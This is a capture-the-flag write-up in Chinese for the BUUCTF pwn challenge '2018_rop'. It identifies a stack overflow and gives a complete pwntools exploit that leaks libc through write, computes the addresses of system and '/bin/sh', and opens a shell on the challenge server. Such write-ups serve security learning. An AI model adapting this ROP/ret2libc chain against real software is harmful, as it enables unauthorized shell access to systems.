BUUCTF-PWN-铁人三项(第五赛区)_2018_rop

checksec

image-20220118192304049

IDA

image-20220118192407544

be_nice_to_people函数不知道在干什么,这道题好像也不需要管

vulnerable_function函数中有一个溢出点

image-20220118192901402

所以这题的思路是用write函数来计算system函数和binsh的地址

EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
from pwn import *
from LibcSearcher import *

context.log_level = 'debug'

p = remote('node4.buuoj.cn', 29883)
# p = process('./2018_rop')
elf = ELF('./2018_rop')

main_addr = elf.sym['main']
print(hex(main_addr))
write_plt = elf.plt['write']
write_got = elf.got['write']

p.sendline(flat(b'a' * (0x88 + 0x4), p32(write_plt), p32(main_addr), p32(1), p32(write_got), p32(4)))
write_addr = u32(p.recv(4))
print(hex(write_addr))

libc = LibcSearcher('write', write_addr)
libc_base = write_addr - libc.dump('write')
system_addr = libc_base + libc.dump('system')
binsh_addr = libc_base + libc.dump('str_bin_sh')

# p.recvuntil('Hello, World\n')
p.sendline(flat(b'a' * (0x88 + 0x4), p32(system_addr), p32(main_addr), p32(binsh_addr)))

p.interactive()

结果

image-20220118193516384

从上往下尝试,0不行,到1的时候就可以了

image-20220118193554495